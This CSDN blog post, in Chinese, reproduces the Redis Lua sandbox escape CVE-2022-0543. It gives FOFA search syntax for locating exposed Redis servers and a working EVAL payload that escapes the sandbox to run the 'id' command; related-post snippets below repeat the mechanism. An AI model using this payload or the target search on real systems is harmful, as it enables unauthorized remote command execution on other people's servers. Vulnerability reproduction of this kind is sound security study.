Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

已于 2023-11-25 22:49:56 修改
阅读量772 收藏
点赞数
分类专栏: 网络安全 文章标签: 数据库安全
于 2023-11-25 22:27:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/XXokok/article/details/134621537
版权
本文描述了Redis的一个未授权访问漏洞(CVE-2022-0543),当Redis未启用认证时,攻击者可通过Lua脚本绕过限制执行命令,包括读取数据。文章提供了漏洞利用方法,如使用空间测绘和AnotherRedisDesktopManager进行连接并执行id命令获取权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。–那么这也就是redis未授权访问了

Redis的默认端口是6379 可以用空间测绘搜索,也可以用nmap等端口扫描工具来扫描

fofa语法搜索:port=“6379” && protocol=“redis”

用Another Redis Desktop Manager连接上数据库之后,在控制台输入以下命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

​​image​​

vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
没有故事
04-18 1078
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。输入网址和端口,点击OK。
Redis 中,`EVAL` 命令用于执行一段 Lua 脚本
相关项目可以查看https://gitee.com/fan-pl或https://github.com/fpl1116
03-27 1499
Redis 中,`EVAL` 命令用于执行一段 Lua 脚本
Redis Lua Script 溢出漏洞CVE-2024-31449)
最新发布
Bertram的博客
02-26 806
Redis Lua Script 溢出漏洞CVE-2024-31449)
Redis Lua绕过命令执行CVE-2022-0543
weixin_54786196的博客
09-02 301
不同环境下的liblua库路径不同,我们需要指定一个正确的路径。而在Vulhub环境(Ubuntu fiocal)中,这个路径是。,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象。环境启动后,我们到另一台kail机连接redis。连接成功之后使用使用。
Redis Lua 逃逸漏洞CVE-2022-0543
chaojixiaojingang
03-18 7964
1.漏洞描述 Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时,在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。 2.漏洞原理 Redis一直有一个攻击点,就是在用户连接redis后,可以通过eval命令执行lua脚本,但这个脚本跑在箱里,正常情况下无法执行命令,读取文件。Ubuntu/D...
Redis 逃逸漏洞复现CVE-2022-0543
hicode0101的博客
01-17 678
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。值得注意的是,不同环境下的liblua库路径不同,你需要指定一个正确的路径。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。
CVE-2022-0543lua绕过命令执行复现
kriesa的博客
07-13 671
CVE-2022-0543复现
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
MateSnake的博客
05-13 1263
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
CVE-2022-0543 Redis Lua绕过 命令执行
Foreverlove112的博客
09-22 623
CVE-2022-0543 Redis Lua绕过 命令执行
Redis 代码执行漏洞--怎么设置禁用lua脚本
洛阳泰山的博客
02-08 1636
Redis,作为一款使用ANSI C编写的开源、支持网络、基于内存的键值对存储数据库,因其出色的性能和灵活性而被广泛应用。然而,最近发现的一个安全漏洞CVE-2024-46981)揭示了Redis在处理Lua脚本引擎内存管理时存在潜在风险。具体来说,经过身份验证的用户可以通过精心构造的Lua脚本操纵内存回收机制,并通过EVAL或EVALSHA命令执行该恶意脚本,从而可能在Redis服务器上执行任意代码。
Redis存在安全漏洞
曼陀罗的博客
12-20 598
Redis是美国Redis公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis存在安全漏洞。攻击者利用该漏洞使用特制的Lua脚本触发堆栈缓冲区溢出漏洞,从而远程执行代码。CVE编号:CVE-2024-31449。
Linux环境加密lua脚本,Wireshark Lua脚本文件任意代码执行漏洞
weixin_39621860的博客
05-11 148
发布日期:2011-07-30更新日期:2011-09-08受影响系统:Wireshark Wireshark 1.6.xWireshark Wireshark 1.4.x不受影响系统:Wireshark Wireshark 1.6.2Wireshark Wireshark 1.4.9描述:------------------------------------------------------...
CVE-2022-0543 Redis Lua 逃逸 RCE
Adminxe的博客
03-14 4375
0x00 背景 巴西研究员 Reginaldo Silva 于 2022 年 3 月 8 日公开披露 该漏洞,从他的博客得知 CVE-2022-0543Redis 逃逸漏洞仅影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞 https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce 0x01 条件 未授权访问或拿到账号密码 目标为Debian及其衍生版 0x02 原理 首先,redis一直有一..
Redis逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 2128
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。
查找linux内核漏洞查用的方法脚本
m0_62207170的博客
03-25 2419
查找linux内核漏洞查用的方法脚本
redis lua绕过
08-14
根引用和引用,在Debian和Ubuntu的Redis发行版中,由于在Lua箱中遗留了一个对象package,攻击者可以利用该对象的方法加载动态链接库liblua里的函数,从而逃逸箱执行任意命令。但要利用这个漏洞,攻击者需要具有执行eval命令的权限,即攻击者经过认证或Redis本身未设置鉴权检查。 另外,根据引用,一些发行版本(如Ubuntu、Debian和CentOS)会在原始软件的基础上打补丁,其中有一个针对Redis的补丁。该补丁在lua_libs_debian.c中增加了一个include语句,并使用make生成补丁包。 综上所述,Redis Lua绕过漏洞存在于Debian和Ubuntu的Redis发行版中,攻击者可以利用这个漏洞来执行任意命令,前提是攻击者具有执行eval命令的权限,并且Redis未设置鉴权检查。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Redis Lua绕过命令执行CVE-2022-0543)](https://blog.youkuaiyun.com/weixin_45495060/article/details/123692356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【CVE-2022-0543Redis Lua绕过命令执行复现](https://blog.youkuaiyun.com/weixin_45329947/article/details/123531319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [简单漏洞CVE-2022-0543 Redis Lua 绕过](https://blog.youkuaiyun.com/qq_74447851/article/details/128791134)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值